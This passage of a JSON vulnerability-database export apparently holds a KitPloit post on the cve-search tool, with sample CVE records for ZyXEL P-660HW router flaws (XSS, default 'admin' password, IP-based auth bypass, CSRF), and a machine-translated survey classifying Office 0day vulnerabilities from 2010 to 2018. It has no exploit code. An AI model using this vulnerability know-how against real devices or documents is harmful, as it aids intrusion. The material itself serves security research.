[\"http://xforce.iss.net/xforce/xfdb/41109\", \"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw_t3:v2\", \"cpe:/h:zyxel:p-660hw:_t1:v2\", \"cpe:/h:zyxel:p-660hw_d1:v2\", \"cpe:/h:zyxel:p-660hw_t3:-\", \"cpe:/h:zyxel:p-660hw:_t1:-\", \"cpe:/h:zyxel:p-660hw_d3:-\", \"cpe:/h:zyxel:p-660hw_d1:-\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"id\": \"CVE-2008-1257\", \"Modified\": \"2012-05-31T00:00:00.000-04:00\", \"cvss\": 4.3, \"summary\": \"Cross-site scripting (XSS) vulnerability in Forms/DiagGeneral_2 on the ZyXEL P-660HW series router allows remote attackers to inject arbitrary web script or HTML via the PingIPAddr parameter.\"}, {\"id\": \"CVE-2008-1256\", \"references\": [\"http://xforce.iss.net/xforce/xfdb/41108\", \"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"Modified\": \"2011-03-07T22:06:25.080-05:00\", \"cvss\": 10.0, \"summary\": \"The ZyXEL P-660HW series router has \\\"admin\\\" as its default password, which allows remote attackers to gain administrative access.\"}, {\"cwe\": \"CWE-264\", \"references\": [\"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\", \"http://xforce.iss.net/xforce/xfdb/41114\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"id\": \"CVE-2008-1255\", \"Modified\": \"2008-09-05T17:37:15.440-04:00\", \"cvss\": 10.0, \"summary\": \"The ZyXEL P-660HW series router maintains authentication state by IP address, which allows remote attackers to bypass authentication by establishing a session from a source IP address of a previously authenticated user.\"}, {\"cwe\": \"CWE-352\", \"references\": [\"http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded\", \"http://www.gnucitizen.org/projects/router-hacking-challenge/\", \"http://xforce.iss.net/xforce/xfdb/41111\"], \"vulnerable_configuration\": [\"cpe:/h:zyxel:p-660hw\"], \"Published\": \"2008-03-10T13:44:00.000-04:00\", \"id\": \"CVE-2008-1254\", \"Modified\": \"2008-09-05T17:37:15.287-04:00\", \"cvss\": 6.8, \"summary\": \"Multiple cross-site request forgery (CSRF) [vulnerabilities](<https://www.kitploit.com/search/label/vulnerabilities>) on the ZyXEL P-660HW series router allow remote attackers to (1) change DNS servers and (2) add keywords to the \\\"bannedlist\\\" via unspecified vectors.\"}]\n\n \n** Software using cve-search ** \n\n\n * [ cve-portal ](<https://www.github.com/CIRCL/cve-portal>) which is a CVE notification portal \n * [ cve-search-mt ](<https://www.github.com/NorthernSec/cve-search-mt>) which is a set of management tools for CVE-Search \n * [ cve-scan ](<https://www.github.com/NorthernSec/cve-scan>) which is a NMap CVE system scanner \n \n\n\n** [ Download cve-search ](<https://github.com/cve-search/cve-search>) **\n", "edition": 88, "modified": "2017-10-17T13:30:15", "published": "2017-10-17T13:30:15", "id": "KITPLOIT:4573857264821982104", "href": "http://www.kitploit.com/2017/10/cve-search-tool-to-perform-local.html", "title": "cve-search - A Tool To Perform Local Searches For Known Vulnerabilities", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
